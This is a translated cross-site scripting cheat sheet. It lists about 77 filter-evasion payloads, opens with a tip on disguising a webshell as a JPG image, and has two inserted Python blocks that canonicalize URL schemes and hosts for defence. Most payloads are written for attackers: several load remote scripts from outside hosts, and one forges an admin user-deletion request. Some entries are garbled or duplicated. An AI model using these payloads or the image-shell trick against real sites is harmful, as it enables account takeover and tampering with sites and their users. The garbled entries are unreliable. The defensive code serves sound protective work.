Cross-site image shell

XSS cross-site code: <script>alert("")</script>

Add the code to the first line of the shell (trojan), change the shell into JPG image format; when the image-format shell is accessed, our shell is still executed.
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript directive
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolons and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML entity encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (charcode calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (charcode calculator)
<IMG SRC=jav..[omitted]..S')>

(9) 7-bit UTF-8 Unicode encoding without semicolons (charcode calculator)
<IMG SRC=jav..[omitted]..S')>

(10) Hex encoding, also without semicolons (charcode calculator)
<IMG SRC=java..[omitted]..XSS')>

(11) Embedded tab to split up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab to split up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">

(15) Multi-line injected JavaScript; this is an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Working around character limits (all pieces must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters are basically useless in China, because there is nowhere they can be exploited
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=" javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Extraneous open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping JavaScript escapes
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) INPUT image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG DYNSRC
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG LOWSRC
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS

(41) META with URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) IFRAME
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) FRAME
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) TABLE
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters added in front (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url( javascript:alert('XSS'))">

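Items (3) to (19) and (46) to (47) are variants of one trick: a filter that looks for the literal text javascript: is defeated by case changes, entity encoding, embedded tabs, newlines and nulls, and the leading control and space characters listed under (47). The defensive counterpart is to canonicalize the attribute value the way a browser does and then allowlist the scheme. The following is an added example in Python, not code from the original page; the function names, the allowlist and the sample inputs are constructed for illustration.

```python
import html
import re
import unicodedata

ALLOWED_SCHEMES = {"http", "https"}            # allowlist; a blocklist is what the vectors defeat
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.-]*$")  # well-formed scheme per RFC 3986

def _is_junk(ch: str) -> bool:
    """Characters item (47) lists as tolerated in front of 'javascript:': controls 1-32,
    the quotes 34 and 39, NBSP 160, the Unicode spaces 8192.. and 12288, the BOM 65279.
    Unicode categories Cc (control), Cf (format) and Zs (space) cover all of them."""
    return ch in "\"'" or unicodedata.category(ch) in ("Cc", "Cf", "Zs")

def canonical_scheme(value: str) -> str:
    """Return the lowercase scheme a browser would act on, or "" for a relative URL."""
    s = html.unescape(value)           # &#106; and &#x6A; forms, with or without ';' (items 5, 8-10)
    while s and _is_junk(s[0]):        # leading spaces and meta characters (items 19, 47)
        s = s[1:]
    head, colon, _rest = s.partition(":")
    if not colon:
        return ""                      # no colon at all: a relative URL
    # Tabs, newlines, CRs and NULs inside "jav ascript" (items 11-14, 17) are dropped here;
    # lower() takes care of "JaVaScRiPt" (item 4).
    scheme = "".join(ch for ch in head if not _is_junk(ch)).lower()
    # "/search?q=a:b" contains a colon but no well-formed scheme before it: relative.
    return scheme if SCHEME_RE.match(scheme) else ""

def is_safe_url(value: str) -> bool:
    """Accept relative URLs and allowlisted schemes; reject everything else."""
    scheme = canonical_scheme(value)
    return scheme == "" or scheme in ALLOWED_SCHEMES

def naive_blocklist_catches(value: str) -> bool:
    """The substring check many filters use, kept only to show what it misses."""
    return "javascript:" in value.lower()

if __name__ == "__main__":
    # Constructed samples in the shape of the page's vectors, plus two benign URLs.
    for s in ["JaVaScRiPt:alert('XSS')", "jav\tascript:alert('XSS');", "java\0script:alert('XSS')",
              "\x01javascript:alert('XSS')", "https://example.test/a.png", "/img/a.png"]:
        print(repr(s), "naive catches:", naive_blocklist_catches(s), "safe:", is_safe_url(s))
```

The check is deliberately stricter than the WHATWG URL parser (it also drops spaces and NULs inside the scheme), so it rejects a few odd but harmless values rather than missing a form an older engine tolerated.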
(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split-up expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous STYLE (made of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE approach
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag; you can embed a Flash file that contains the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf"></EMBED>

(56) Using ActionScript inside Flash, your XSS code can be mixed in
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace; the .HTC file must be on the same server as your XSS payload
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, you can add JS code inside an image and exploit that
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL evasion
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) Decimal IP
<A HREF="http://3232235521">XSS</A>

(71) Hexadecimal IP
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) Octal IP
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>

(74) Dropping [http:]
<A HREF="//www.google.com/">XSS</A>

(75) Dropping [www]
<A HREF="http://google.com/">XSS</A>

(76) Absolute DNS with a trailing dot
<A HREF="http://www.google.com./">XSS</A>

(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
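Items (68) to (76) show the same host spelled in decimal, hex, octal and mixed forms, with tabs and newlines inside the URL, with a trailing dot, and without the scheme. A link or fetch policy that compares the host as written treats each spelling as a different destination. The added example below (Python; not code from the original page; the function names are constructed) canonicalizes the host the way the WHATWG URL parser does and then uses the result to flag links whose real destination is a loopback or private address, as in (68).

```python
import ipaddress
from urllib.parse import urlsplit

def _ipv4_number(part: str):
    """One dotted part as hex (0x..), octal (leading 0) or decimal; None if not numeric."""
    if part[:2].lower() == "0x":
        base, digits = 16, part[2:]
    elif len(part) > 1 and part[0] == "0":
        base, digits = 8, part[1:]
    else:
        base, digits = 10, part
    if not digits:
        return 0                      # a bare "0" or "0x" means zero
    try:
        return int(digits, base) if digits.isalnum() else None   # isalnum() rejects "1_0"
    except ValueError:
        return None                   # "www", "3w": part of a name, not a number

def _legacy_ipv4(host: str):
    """Dotted quad for a dword, hex, octal or mixed IPv4 host (items 70-73), else None."""
    parts = host.split(".")
    if len(parts) > 4 or not parts[-1]:
        return None
    nums = [_ipv4_number(p) for p in parts]
    if any(n is None for n in nums):
        return None                   # a domain name, not an IPv4 literal
    *lead, last = nums
    if any(n > 255 for n in lead) or last >= 256 ** (4 - len(lead)):
        return None                   # out of range: browsers refuse this host
    value = last                      # the last part fills all remaining bytes
    for i, n in enumerate(lead):
        value += n << (8 * (3 - i))
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))

def canonical_host(url: str) -> str:
    """The lowercase host a browser actually contacts, or "" when there is none."""
    url = "".join(ch for ch in url if ch not in "\t\n\r")   # item (73): tab and newline vanish
    host = urlsplit(url).hostname or ""                     # also handles "//host/" (item 74)
    host = host[:-1] if host.endswith(".") else host        # item (76): one trailing dot
    return _legacy_ipv4(host) or host

def points_to_internal_address(url: str) -> bool:
    """True when the link, however it is spelled, resolves to loopback or private space."""
    try:
        ip = ipaddress.ip_address(canonical_host(url))
    except ValueError:
        return False                  # not an IP literal; a name needs DNS to judge
    return ip.is_loopback or ip.is_private
```

Compare canonical hosts, never raw strings, whether the policy is an allowlist of link targets or a denylist of internal ranges.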